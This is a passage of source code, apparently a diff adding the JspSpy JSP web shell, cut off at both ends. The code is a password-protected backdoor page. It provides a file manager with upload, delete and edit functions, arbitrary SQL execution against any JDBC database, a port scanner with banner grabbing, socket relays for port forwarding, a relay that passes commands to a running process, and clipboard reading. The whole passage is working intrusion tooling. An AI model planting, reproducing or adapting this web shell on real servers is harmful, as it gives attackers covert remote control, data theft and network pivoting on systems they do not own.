(this.stmt != null) + stmt.close(); + } + + public boolean isValid() throws Exception { + return conn != null && !conn.isClosed(); + } + + public void close() throws Exception { + if (isValid()) { + closeStmt(); + conn.close(); + } + } + + public boolean equals(Object o) { + if (o instanceof DBOperator) { + DBOperator dbo = (DBOperator) o; + return this.driver.equals(dbo.driver) + && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) + && this.pwd.equals(dbo.pwd); + } + return false; + } + + public Connection getConn() { + return this.conn; + } + } + + private static class StreamConnector extends Thread { + private InputStream is; + private OutputStream os; + + public StreamConnector(InputStream is, OutputStream os) { + this.is = is; + this.os = os; + } + + public void run() { + BufferedReader in = null; + BufferedWriter out = null; + try { + in = new BufferedReader(new InputStreamReader(this.is)); + out = new BufferedWriter(new OutputStreamWriter(this.os)); + char buffer[] = new char[8192]; + int length; + while ((length = in.read(buffer, 0, buffer.length)) > 0) { + out.write(buffer, 0, length); + out.flush(); + } + } catch (Exception e) { + } + try { + if (in != null) + in.close(); + if (out != null) + out.close(); + } catch (Exception e) { + } + } + + public static void readFromLocal(final DataInputStream localIn, + final DataOutputStream remoteOut) { + new Thread(new Runnable() { + public void run() { + while (true) { + try { + byte[] data = new byte[100]; + int len = localIn.read(data); + while (len != -1) { + remoteOut.write(data, 0, len); + len = localIn.read(data); + } + } catch (Exception e) { + break; + } + } + } + }).start(); + } + + public static void readFromRemote(final Socket soc, + final Socket remoteSoc, final DataInputStream remoteIn, + final DataOutputStream localOut) { + new Thread(new Runnable() { + public void run() { + while (true) { + try { + byte[] data = new byte[100]; + int len = remoteIn.read(data); + while (len != -1) { + localOut.write(data, 0, len); + len = remoteIn.read(data); + } + } catch (Exception e) { + try { + soc.close(); + remoteSoc.close(); + } catch (Exception ex) { + } + break; + } + } + } + }).start(); + } + } + + private static class EnterFile extends File { + private ZipFile zf = null; + private ZipEntry entry = null; + private boolean isDirectory = false; + private String absolutePath = null; + + public void setEntry(ZipEntry e) { + this.entry = e; + } + + public void setAbsolutePath(String p) { + this.absolutePath = p; + } + + public void close() throws Exception { + this.zf.close(); + } + + public void setZf(String p) throws Exception { + if (p.toLowerCase().endsWith(".jar")) + this.zf = new JarFile(p); + else + this.zf = new ZipFile(p); + } + + public EnterFile(File parent, String child) { + super(parent, child); + } + + public EnterFile(String pathname) { + super(pathname); + } + + public EnterFile(String pathname, boolean isDir) { + this(pathname); + this.isDirectory = isDir; + } + + public EnterFile(String parent, String child) { + super(parent, child); + } + + public EnterFile(URI uri) { + super(uri); + } + + public boolean exists() { + return new File(this.zf.getName()).exists(); + } + + public File[] listFiles() { + java.util.List list = new ArrayList(); + java.util.List handled = new ArrayList(); + String currentDir = super.getPath(); + currentDir = currentDir.replace('\\', '/'); + if (currentDir.indexOf("/") == 0) { + if (currentDir.length() > 1) + currentDir = currentDir.substring(1); + else + currentDir = ""; + } + Enumeration e = this.zf.entries(); + while (e.hasMoreElements()) { + ZipEntry entry = (ZipEntry) e.nextElement(); + String eName = entry.getName(); + if (this.zf instanceof JarFile) { + if (!entry.isDirectory()) { + EnterFile ef = new EnterFile(eName); + ef.setEntry(entry); + try { + ef.setZf(this.zf.getName()); + } catch (Exception ex) { + } + list.add(ef); + } + } else { + if (currentDir.equals("")) { + //zip root directory + if (eName.indexOf("/") == -1 + || eName.matches("[^/]+/$")) { + EnterFile ef = new EnterFile(eName.replaceAll("/", + "")); + handled.add(eName.replaceAll("/", "")); + ef.setEntry(entry); + list.add(ef); + } else { + if (eName.indexOf("/") != -1) { + String tmp = eName.substring(0, eName + .indexOf("/")); + if (!handled.contains(tmp) + && !Util.isEmpty(tmp)) { + EnterFile ef = new EnterFile(tmp, true); + ef.setEntry(entry); + list.add(ef); + handled.add(tmp); + } + } + } + } else { + if (eName.startsWith(currentDir)) { + if (eName.matches(currentDir + "/[^/]+/?$")) { + //file. + EnterFile ef = new EnterFile(eName); + ef.setEntry(entry); + list.add(ef); + if (eName.endsWith("/")) { + String tmp = eName.substring(eName + .lastIndexOf('/', + eName.length() - 2)); + tmp = tmp.substring(1, tmp.length() - 1); + handled.add(tmp); + } + } else { + //dir + try { + String tmp = eName.substring(currentDir + .length() + 1); + tmp = tmp.substring(0, tmp.indexOf('/')); + if (!handled.contains(tmp) + && !Util.isEmpty(tmp)) { + EnterFile ef = new EnterFile(tmp, true); + ef.setAbsolutePath(currentDir + "/" + + tmp); + ef.setEntry(entry); + list.add(ef); + handled.add(tmp); + } + } catch (Exception ex) { + } + } + } + } + } + } + return (File[]) list.toArray(new File[0]); + } + + public boolean isDirectory() { + return this.entry.isDirectory() || this.isDirectory; + } + + public String getParent() { + return ""; + } + + public String getAbsolutePath() { + return absolutePath != null ? absolutePath : super.getPath(); + } + + public String getName() { + if (this.zf instanceof JarFile) { + return this.getAbsolutePath(); + } else { + return super.getName(); + } + } + + public long lastModified() { + return entry.getTime(); + } + + public boolean canRead() { + return false; + } + + public boolean canWrite() { + return false; + } + + public boolean canExecute() { + return false; + } + + public long length() { + return entry.getSize(); + } + } + + private static class OnLineProcess { + private String cmd = "first"; + private Process pro; + + public OnLineProcess(Process p) { + this.pro = p; + } + + public void setPro(Process p) { + this.pro = p; + } + + public void setCmd(String c) { + this.cmd = c; + } + + public String getCmd() { + return this.cmd; + } + + public Process getPro() { + return this.pro; + } + + public void stop() { + this.pro.destroy(); + } + } + + private static class OnLineConnector extends Thread { + private OnLineProcess ol = null; + private InputStream is; + private OutputStream os; + private String name; + + public OnLineConnector(InputStream is, OutputStream os, String name, + OnLineProcess ol) { + this.is = is; + this.os = os; + this.name = name; + this.ol = ol; + } + + public void run() { + BufferedReader in = null; + BufferedWriter out = null; + try { + in = new BufferedReader(new InputStreamReader(this.is)); + out = new BufferedWriter(new OutputStreamWriter(this.os)); + char buffer[] = new char[128]; + if (this.name.equals("exeRclientO")) { + //from exe to client + int length = 0; + while ((length = in.read(buffer, 0, buffer.length)) > 0) { + String str = new String(buffer, 0, length); + str = str.replaceAll("&", "&").replaceAll("<", + "<").replaceAll(">", ">"); + str = str.replaceAll("" + (char) 13 + (char) 10, + "
"); + str = str.replaceAll("\n", "
"); + out.write(str.toCharArray(), 0, str.length()); + out.flush(); + } + } else { + //from client to exe + while (true) { + while (this.ol.getCmd() == null) { + Thread.sleep(500); + } + if (this.ol.getCmd().equals("first")) { + this.ol.setCmd(null); + continue; + } + this.ol.setCmd(this.ol.getCmd() + (char) 10); + char[] arr = this.ol.getCmd().toCharArray(); + out.write(arr, 0, arr.length); + out.flush(); + this.ol.setCmd(null); + } + } + } catch (Exception e) { + } + try { + if (in != null) + in.close(); + if (out != null) + out.close(); + } catch (Exception e) { + } + } + } + + private static class Table { + private ArrayList rows = null; + private boolean echoTableTag = false; + + public void setEchoTableTag(boolean v) { + this.echoTableTag = v; + } + + public Table() { + this.rows = new ArrayList(); + } + + public void addRow(Row r) { + this.rows.add(r); + } + + public String toString() { + StringBuffer html = new StringBuffer(); + if (echoTableTag) + html.append(""); + for (int i = 0; i < rows.size(); i++) { + Row r = (Row) rows.get(i); + html + .append(""); + ArrayList columns = r.getColumns(); + for (int a = 0; a < columns.size(); a++) { + Column c = (Column) columns.get(a); + html.append(""); + } + html.append(""); + } + if (echoTableTag) + html.append("
"); + String vv = Util.htmlEncode(Util.getStr(c.getValue())); + if (vv.equals("")) + vv = " "; + html.append(vv); + html.append("
"); + return html.toString(); + } + + public static String rs2Table(ResultSet rs, String sep, boolean op) + throws Exception { + StringBuffer table = new StringBuffer(); + ResultSetMetaData meta = rs.getMetaData(); + int count = meta.getColumnCount(); + if (!op) + table + .append(" View Struct - View All Tables

"); + else + table + .append(" All Tables

"); + table + .append(""); + table + .append(""); + for (int i = 1; i <= count; i++) { + table.append(""); + } + if (op) + table.append(""); + table.append(""); + while (rs.next()) { + String tbName = null; + table + .append(""); + for (int i = 1; i <= count; i++) { + String v = rs.getString(i); + if (i == 3) + tbName = v; + table.append(""); + } + if (op) + table + .append(""); + table.append(""); + } + table.append("
" + meta.getColumnName(i) + " 
" + Util.null2Nbsp(v) + " View | Struct | Export | Save To File

"); + return table.toString(); + } + } + + private static class Row { + private ArrayList cols = null; + + public Row() { + this.cols = new ArrayList(); + } + + public void addColumn(Column n) { + this.cols.add(n); + } + + public ArrayList getColumns() { + return this.cols; + } + } + + private static class Column { + private String value; + + public Column(String v) { + this.value = v; + } + + public String getValue() { + return this.value; + } + } + + private static class Util { + public static boolean isEmpty(String s) { + return s == null || s.trim().equals(""); + } + + public static boolean isEmpty(Object o) { + return o == null || isEmpty(o.toString()); + } + + public static String getSize(long size, char danwei) { + if (danwei == 'M') { + double v = formatNumber(size / 1024.0 / 1024.0, 2); + if (v > 1024) { + return getSize(size, 'G'); + } else { + return v + "M"; + } + } else if (danwei == 'G') { + return formatNumber(size / 1024.0 / 1024.0 / 1024.0, 2) + "G"; + } else if (danwei == 'K') { + double v = formatNumber(size / 1024.0, 2); + if (v > 1024) { + return getSize(size, 'M'); + } else { + return v + "K"; + } + } else if (danwei == 'B') { + if (size > 1024) { + return getSize(size, 'K'); + } else { + return size + "B"; + } + } + return "" + 0 + danwei; + } + + public static boolean exists(String[] arr, String v) { + for (int i = 0; i < arr.length; i++) { + if (v.equals(arr[i])) { + return true; + } + } + return false; + } + + public static double formatNumber(double value, int l) { + NumberFormat format = NumberFormat.getInstance(); + format.setMaximumFractionDigits(l); + format.setGroupingUsed(false); + return new Double(format.format(value)).doubleValue(); + } + + public static boolean isInteger(String v) { + if (isEmpty(v)) + return false; + return v.matches("^\\d+$"); + } + + public static String formatDate(long time) { + SimpleDateFormat format = new SimpleDateFormat( + "yyyy-MM-dd hh:mm:ss"); + return format.format(new java.util.Date(time)); + } + + public static String convertPath(String path) { + return path != null ? path.replace('\\', '/') : ""; + } + + public static String htmlEncode(String v) { + if (isEmpty(v)) + return ""; + return v.replaceAll("&", "&").replaceAll("<", "<") + .replaceAll(">", ">"); + } + + public static String getStr(String s) { + return s == null ? "" : s; + } + + public static String null2Nbsp(String s) { + if (s == null) + s = " "; + return s; + } + + public static String getStr(Object s) { + return s == null ? "" : s.toString(); + } + + public static String exec(String regex, String str, int group) { + Pattern pat = Pattern.compile(regex); + Matcher m = pat.matcher(str); + if (m.find()) + return m.group(group); + return null; + } + + public static void outMsg(Writer out, String msg) throws Exception { + outMsg(out, msg, "center"); + } + + public static void outMsg(Writer out, String msg, String align) + throws Exception { + out + .write("
" + + msg + + "
"); + } + + public static String highLight(String str) { + str = str + .replaceAll( + "\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b", + "$1"); + str = str.replaceAll("\t(//.+)", + "\t$1"); + return str; + } + } + + private static class UploadBean { + private String fileName = null; + private String suffix = null; + private String savePath = ""; + private ServletInputStream sis = null; + private OutputStream targetOutput = null; + private byte[] b = new byte[1024]; + + public void setTargetOutput(OutputStream stream) { + this.targetOutput = stream; + } + + public UploadBean() { + } + + public void setSavePath(String path) { + this.savePath = path; + } + + public String getFileName() { + return this.fileName; + } + + public void parseRequest(HttpServletRequest request) throws IOException { + sis = request.getInputStream(); + int a = 0; + int k = 0; + String s = ""; + while ((a = sis.readLine(b, 0, b.length)) != -1) { + s = new String(b, 0, a, PAGE_CHARSET); + if ((k = s.indexOf("filename=\"")) != -1) { + s = s.substring(k + 10); + k = s.indexOf("\""); + s = s.substring(0, k); + File tF = new File(s); + if (tF.isAbsolute()) { + fileName = tF.getName(); + } else { + fileName = s; + } + k = s.lastIndexOf("."); + suffix = s.substring(k + 1); + upload(); + } + } + } + + private void upload() throws IOException { + try { + OutputStream out = null; + if (this.targetOutput != null) + out = this.targetOutput; + else + out = new FileOutputStream(new File(savePath, fileName)); + int a = 0; + int k = 0; + String s = ""; + while ((a = sis.readLine(b, 0, b.length)) != -1) { + s = new String(b, 0, a); + if ((k = s.indexOf("Content-Type:")) != -1) { + break; + } + } + sis.readLine(b, 0, b.length); + while ((a = sis.readLine(b, 0, b.length)) != -1) { + s = new String(b, 0, a); + if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) + && (b[3] == 45) && (b[4] == 45)) { + break; + } + out.write(b, 0, a); + } + if (out instanceof FileOutputStream) + out.close(); + } catch (IOException ioe) { + throw ioe; + } + } + }%> +<% + + SHELL_NAME = request.getServletPath().substring( + request.getServletPath().lastIndexOf("/") + 1); + String myAbsolutePath = application.getRealPath(request + .getServletPath()); + if (Util.isEmpty(myAbsolutePath)) {//for weblogic + SHELL_NAME = request.getServletPath(); + myAbsolutePath = new File(application.getResource("/") + .getPath() + + SHELL_NAME).toString(); + SHELL_NAME = request.getContextPath() + SHELL_NAME; + WEB_ROOT = new File(application.getResource("/").getPath()) + .toString(); + } else { + WEB_ROOT = application.getRealPath("/"); + } + SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0, + myAbsolutePath.lastIndexOf(File.separator))); + if (SHELL_DIR.indexOf('/') == 0) + ISLINUX = true; + else + ISLINUX = false; + if (session.getAttribute(CURRENT_DIR) == null) + session.setAttribute(CURRENT_DIR, Util.convertPath(SHELL_DIR)); + //request = new MyRequest(request); + if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null + || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { + String o = request.getParameter("o"); + if(o != null) + o = new String(o.getBytes(REQUEST_CHARSET), PAGE_CHARSET); + if (o != null && o.equals("login")) { + ((Invoker) ins.get("login")).invoke(request, response, + session); + return; + } else if (o != null && o.equals("vLogin")) { + ((Invoker) ins.get("vLogin")).invoke(request, response, + session); + return; + } else { + ((Invoker) ins.get("vLogin")).invoke(request, response, + session); + return; + } + } +%> +<%!private static interface Invoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception; + + public boolean doBefore(); + + public boolean doAfter(); + } + + private static class DefaultInvoker implements Invoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + } + + public boolean doBefore() { + return true; + } + + public boolean doAfter() { + return true; + } + } + + private static class ScriptInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out + .println(""); + + } catch (Exception e) { + + throw e; + } + } + } + + private static class BeforeInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out + .println("JspSpy"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class AfterInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out.println(""); + } catch (Exception e) { + + throw e; + } + } + } + + private static class DeleteBatchInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String files = request.getParameter("files"); + int success = 0; + int failed = 0; + if (!Util.isEmpty(files)) { + String currentDir = JSession.getAttribute(CURRENT_DIR) + .toString(); + String[] arr = files.split(","); + for (int i = 0; i < arr.length; i++) { + String fs = arr[i]; + File f = new File(currentDir, fs); + if (f.delete()) + success += 1; + else + failed += 1; + } + } + JSession + .setAttribute( + MSG, + success + + " Files Deleted Success , " + + failed + + " Files Deleted Failed!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + private static class ClipBoardInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out + .println("" + + " " + + " " + " " + + "
" + + "

System Clipboard »

" + + "

");
+				try {
+					out.println(Util.htmlEncode(Util.getStr(Toolkit
+							.getDefaultToolkit().getSystemClipboard()
+							.getContents(DataFlavor.stringFlavor)
+							.getTransferData(DataFlavor.stringFlavor))));
+				} catch (Exception ex) {
+					out.println("ClipBoard is Empty Or Is Not Text Data !");
+				}
+				out
+						.println("
" + + " " + + "

" + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class VPortScanInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String ip = request.getParameter("ip"); + String ports = request.getParameter("ports"); + String timeout = request.getParameter("timeout"); + String banner = request.getParameter("banner"); + if (Util.isEmpty(ip)) + ip = "127.0.0.1"; + if (Util.isEmpty(ports)) + ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; + if (Util.isEmpty(timeout)) + timeout = "2"; + out + .println("
" + + "

PortScan >>

" + + "
" + + "

" + + "IP : Port : Banner Timeout (Second) : " + + "

" + + "
" + + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class PortScanInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + ((Invoker) ins.get("vPortScan")).invoke(request, response, + JSession); + out.println("
"); + String ip = request.getParameter("ip"); + String ports = request.getParameter("ports"); + String timeout = request.getParameter("timeout"); + String banner = request.getParameter("banner"); + int iTimeout = 0; + if (Util.isEmpty(ip) || Util.isEmpty(ports)) + return; + if (!Util.isInteger(timeout)) { + timeout = "2"; + } + iTimeout = Integer.parseInt(timeout); + Map rs = new LinkedHashMap(); + String[] portArr = ports.split(","); + for (int i = 0; i < portArr.length; i++) { + String port = portArr[i]; + BufferedReader r = null; + try { + Socket s = new Socket(); + s.connect(new InetSocketAddress(ip, Integer + .parseInt(port)), iTimeout); + s.setSoTimeout(iTimeout); + if (!Util.isEmpty(banner)) { + r = new BufferedReader(new InputStreamReader(s + .getInputStream())); + StringBuffer sb = new StringBuffer(); + String b = r.readLine(); + while (b != null) { + sb.append(b + " "); + try { + b = r.readLine(); + } catch (Exception e) { + break; + } + } + rs.put(port, + "Open " + + sb.toString() + ""); + r.close(); + } else { + rs.put(port, "Open"); + } + s.close(); + } catch (Exception e) { + if (e.toString().toLowerCase() + .indexOf("read timed out") != -1) { + rs + .put( + port, + "Open <<No Banner!>>"); + if (r != null) + r.close(); + } else { + rs.put(port, "Close"); + } + } + } + out.println("
"); + Set entrySet = rs.entrySet(); + Iterator it = entrySet.iterator(); + while (it.hasNext()) { + Map.Entry e = (Map.Entry) it.next(); + String port = (String) e.getKey(); + String value = (String) e.getValue(); + out.println(ip + " : " + port + + " ................................. " + value + "
"); + } + out.println("
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class VConnInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + Object obj = JSession.getAttribute(DBO); + if (obj == null || !((DBOperator) obj).isValid()) { + out + .println(" "); + out + .println("
" + + "
" + + "" + + "

DataBase Manager »

" + + "" + + "

" + + "Driver:" + + " " + + "URL:" + + "" + + "UID:" + + "" + + "PWD:" + + "" + + "DataBase:" + + " " + + "" + + "

" + + "
"); + } else { + ((Invoker) ins.get("dbc")).invoke(request, response, + JSession); + } + } catch (ClassCastException e) { + throw e; + } catch (Exception e) { + + throw e; + } + } + } + + //DBConnect + private static class DbcInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String driver = request.getParameter("driver"); + String url = request.getParameter("url"); + String uid = request.getParameter("uid"); + String pwd = request.getParameter("pwd"); + String sql = request.getParameter("sql"); + String selectDb = request.getParameter("selectDb"); + if (selectDb == null) + selectDb = JSession.getAttribute("selectDb").toString(); + else + JSession.setAttribute("selectDb", selectDb); + Object dbo = JSession.getAttribute(DBO); + if (dbo == null || !((DBOperator) dbo).isValid()) { + if (dbo != null) + ((DBOperator) dbo).close(); + dbo = new DBOperator(driver, url, uid, pwd, true); + } else { + if (!Util.isEmpty(driver) && !Util.isEmpty(url) + && !Util.isEmpty(uid)) { + DBOperator oldDbo = (DBOperator) dbo; + dbo = new DBOperator(driver, url, uid, pwd); + if (!oldDbo.equals(dbo)) { + ((DBOperator) oldDbo).close(); + ((DBOperator) dbo).connect(); + } else { + dbo = oldDbo; + } + } + } + DBOperator Ddbo = (DBOperator) dbo; + JSession.setAttribute(DBO, Ddbo); + if (!Util.isEmpty(request.getParameter("type")) + && request.getParameter("type").equals("switch")) { + Ddbo.getConn().setCatalog(request.getParameter("catalog")); + } + Util.outMsg(out, "Connect To DataBase Success!"); + out + .println(" "); + out + .println("
" + + "
" + + "" + + "

DataBase Manager »

" + + "" + + "

" + + "Driver:" + + " " + + "URL:" + + "" + + "UID:" + + "" + + "PWD:" + + "" + + "DataBase:" + + " " + + "" + + "

" + + "
"); + DatabaseMetaData meta = Ddbo.getConn().getMetaData(); + out + .println("
" + + "

Version : " + + meta.getDatabaseProductName() + + " , " + + meta.getDatabaseProductVersion() + + "
URL : " + + meta.getURL() + + "
Catalog : " + + Ddbo.getConn().getCatalog() + + "
UserName : " + + meta.getUserName() + + "

Run SQL query/queries on database / Switch Database : "); + out + .println("

"); + if (Util.isEmpty(sql)) { + String type = request.getParameter("type"); + if (Util.isEmpty(type) || type.equals("switch")) { + ResultSet tbs = meta.getTables(null, null, null, null); + out.println(Table.rs2Table(tbs, meta + .getIdentifierQuoteString(), true)); + tbs.close(); + } else if (type.equals("struct")) { + String tb = request.getParameter("table"); + if (Util.isEmpty(tb)) + return; + ResultSet t = meta.getColumns(null, null, tb, null); + out.println(Table.rs2Table(t, "", false)); + t.close(); + } + } + } catch (Exception e) { + JSession + .setAttribute( + MSG, + "Some Error Occurred. Please Check Out the StackTrace Follow." + + BACK_HREF); + throw e; + } + } + } + + private static class ExecuteSQLInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String sql = request.getParameter("sql"); + String db = request.getParameter("selectDb"); + Object dbo = JSession.getAttribute(DBO); + if (!Util.isEmpty(sql)) { + if (dbo == null || !((DBOperator) dbo).isValid()) { + ((Invoker) ins.get("vConn")).invoke(request, response, + JSession); + return; + } else { + ((Invoker) ins.get("dbc")).invoke(request, response, + JSession); + Object obj = ((DBOperator) dbo).execute(sql); + if (obj instanceof ResultSet) { + ResultSet rs = (ResultSet) obj; + ResultSetMetaData meta = rs.getMetaData(); + int colCount = meta.getColumnCount(); + out + .println("Query#0 : " + + Util.htmlEncode(sql) + + "

"); + out + .println(""); + for (int i = 1; i <= colCount; i++) { + out.println(""); + } + out.println(""); + Table tb = new Table(); + while (rs.next()) { + Row r = new Row(); + for (int i = 1; i <= colCount; i++) { + String v = null; + try { + v = rs.getString(i); + } catch (SQLException ex) { + v = "<>"; + } + r.addColumn(new Column(v)); + } + tb.addRow(r); + } + out.println(tb.toString()); + out.println("
" + + meta.getColumnName(i) + "
" + + meta.getColumnTypeName(i) + + "

"); + rs.close(); + ((DBOperator) dbo).closeStmt(); + } else { + out + .println("affected rows : " + + obj + "

"); + } + } + } else { + ((Invoker) ins.get("dbc")).invoke(request, response, + JSession); + } + } catch (Exception e) { + + throw e; + } + } + } + + private static class VLoginInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out + .println("jspspy
" + + "" + + "

Password: " + + " " + + " " + + " " + + "
" + + "

" + + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class LoginInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String inputPw = request.getParameter("pw"); + if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { + ((Invoker) ins.get("vLogin")).invoke(request, response, + JSession); + return; + } else { + JSession.setAttribute(PW_SESSION_ATTRIBUTE, inputPw); + response.sendRedirect(SHELL_NAME); + return; + } + } catch (Exception e) { + + throw e; + } + } + } + + private static class MyComparator implements Comparator { + public int compare(Object obj1, Object obj2) { + try { + if (obj1 != null && obj2 != null) { + File f1 = (File) obj1; + File f2 = (File) obj2; + if (f1.isDirectory()) { + if (f2.isDirectory()) { + return f1.getName().compareTo(f2.getName()); + } else { + return -1; + } + } else { + if (f2.isDirectory()) { + return 1; + } else { + return f1.getName().toLowerCase().compareTo( + f2.getName().toLowerCase()); + } + } + } + return 0; + } catch (Exception e) { + return 0; + } + } + } + + private static class FileListInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String path2View = null; + PrintWriter out = response.getWriter(); + String path = request.getParameter("folder"); + String outEntry = request.getParameter("outentry"); + if (!Util.isEmpty(outEntry) && outEntry.equals("true")) { + JSession.removeAttribute(ENTER); + JSession.removeAttribute(ENTER_MSG); + JSession.removeAttribute(ENTER_CURRENT_DIR); + } + Object enter = JSession.getAttribute(ENTER); + File file = null; + if (!Util.isEmpty(enter)) { + if (Util.isEmpty(path)) { + if (JSession.getAttribute(ENTER_CURRENT_DIR) == null) + path = "/"; + else + path = (String) (JSession + .getAttribute(ENTER_CURRENT_DIR)); + } + file = new EnterFile(path); + ((EnterFile) file).setZf((String) enter); + JSession.setAttribute(ENTER_CURRENT_DIR, path); + } else { + if (Util.isEmpty(path)) + path = JSession.getAttribute(CURRENT_DIR).toString(); + JSession.setAttribute(CURRENT_DIR, Util.convertPath(path)); + file = new File(path); + } + path2View = Util.convertPath(path); + if (!file.exists()) { + throw new Exception(path + "Dont Exists !"); + } + File[] list = file.listFiles(); + Arrays.sort(list, new MyComparator()); + out.println("
"); + String cr = null; + try { + cr = JSession.getAttribute(CURRENT_DIR).toString() + .substring(0, 3); + } catch (Exception e) { + cr = "/"; + } + File currentRoot = new File(cr); + out.println("

File Manager - Current disk "" + + (cr.indexOf("/") == 0 ? "/" : currentRoot.getPath()) + + "" total (unknow)

"); + out + .println("
" + + "" + + " " + + " " + + " " + + " " + + " " + "
Current Directory
" + "
"); + out + .println("" + + "" + "" + + "" + + " " + + " " + + " " + + " " + + " " + ""); + if (file.getParent() != null) { + out + .println("" + + "" + + "" + + ""); + } + int dircount = 0; + int filecount = 0; + for (int i = 0; i < list.length; i++) { + File f = list[i]; + if (f.isDirectory()) { + dircount++; + out + .println("" + + "" + + "" + + "" + + "" + + "" + + ""); + } else { + filecount++; + out + .println("" + + "" + + "" + + "" + + "" + + "" + + ""); + } + } + out + .println("" + + " " + " " + "
" + + "
" + + "Web Root" + + " | Shell Directory" + + " | New Directory | New File" + " | "); + File[] roots = file.listRoots(); + for (int i = 0; i < roots.length; i++) { + File r = roots[i]; + out.println("Disk(" + + Util.convertPath(r.getPath()) + ")"); + if (i != roots.length - 1) { + out.println("|"); + } + } + out.println("
 NameLast ModifiedSizeRead/Write/Execute 
=Goto Parent
0" + + f.getName() + + "" + + Util.formatDate(f.lastModified()) + + "--" + + f.canRead() + + " / " + + f.canWrite() + + " / unknow"); + if (enter != null) + out.println(" "); + else + out + .println("Del | Move | Pack"); + out.println("
" + + f.getName() + + "" + + Util.formatDate(f.lastModified()) + + "" + + Util.getSize(f.length(), 'B') + + "" + + "" + + f.canRead() + + " / " + + f.canWrite() + + " / unknow " + + "Edit | " + + "Down | " + + "Copy"); + if (enter == null) { + out + .println(" | Move | " + + "Property | " + + "Enter"); + if (f.getName().endsWith(".zip") + || f.getName().endsWith(".jar")) { + out + .println(" | UnPack"); + } else if (f.getName().endsWith(".rar")) { + out + .println(" | UnPack"); + } else { + out + .println(" | Pack"); + } + } + out.println("
 "); + if (enter != null) + out + .println("Pack Selected - Delete Selected"); + else + out + .println("Pack Selected - Delete Selected"); + out.println("" + + dircount + " directories / " + filecount + + " files
"); + out.println("
"); + if (file instanceof EnterFile) + ((EnterFile) file).close(); + } catch (ZipException e) { + JSession.setAttribute(MSG, "\"" + + JSession.getAttribute(ENTER).toString() + + "\" Is Not a Zip File. Please Exit."); + throw e; + } catch (Exception e) { + JSession.setAttribute(MSG, + "File Does Not Exist Or You Dont Have Privilege." + + BACK_HREF); + throw e; + } + } + } + + private static class LogoutInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + Object dbo = JSession.getAttribute(DBO); + if (dbo != null) + ((DBOperator) dbo).close(); + Object obj = JSession.getAttribute(PORT_MAP); + if (obj != null) { + ServerSocket s = (ServerSocket) obj; + s.close(); + } + Object online = JSession.getAttribute(SHELL_ONLINE); + if (online != null) + ((OnLineProcess) online).stop(); + JSession.invalidate(); + ((Invoker) ins.get("vLogin")).invoke(request, response, + JSession); + } catch (ClassCastException e) { + JSession.invalidate(); + ((Invoker) ins.get("vLogin")).invoke(request, response, + JSession); + } catch (Exception e) { + + throw e; + } + } + } + + private static class UploadInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + UploadBean fileBean = new UploadBean(); + response.getWriter().println( + JSession.getAttribute(CURRENT_DIR).toString()); + fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR) + .toString()); + fileBean.parseRequest(request); + File f = new File(JSession.getAttribute(CURRENT_DIR) + "/" + + fileBean.getFileName()); + if (f.exists() && f.length() > 0) + JSession + .setAttribute(MSG, + "Upload File Success!"); + else + JSession + .setAttribute("MSG", + "Upload File Failed!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) 